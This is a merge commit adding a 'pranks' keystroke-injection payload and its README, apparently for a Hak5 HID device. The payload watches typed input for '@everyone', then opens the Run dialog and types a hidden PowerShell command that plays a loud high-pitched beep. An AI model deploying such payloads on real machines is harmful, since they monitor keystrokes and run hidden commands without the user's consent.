Merge pull request #17 from cribb-it/master

new payload punish everyone
pull/21/head
Darren Kitchen 2021-08-17 11:15:44 -05:00 committed by GitHub
commit d0924788ff
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,17 @@
# Title: Punish @Everyone
# Description: Punish the user for typing @everyone with a high pitch sound
# Author: Cribbit
# Version: 1.0
# Category: pranks
# Target: Windows 7+
# Attackmodes: HID
# Notes: Beep takes a frequency between 37 and 32767 and a time.
MATCH (?i)@everyone
QUACK LOCK
QUACK GUI r
sleep 5
QUACK STRING "powershell -NoP -NonI -W Hidden .([console]::beep(8000,5000))"
QUACK ENTER
QUACK UNLOCK

View File

@ -0,0 +1,20 @@
# Punish @everyone
* Author: Cribbit
* Version: 1.0
* Target: Windows 7+ (Powershell)
* Category: pranks
* Attackmode: HID
## Change Log
| Version | Changes |
| ------- | ------------------------------|
| 1.0 | Initial release |
## Description
Punish the user for typing @everyone with a high pitch sound
## Match
(?i)@everyone
## Configuration
Beep takes a frequency between 37 and 32767 and a time.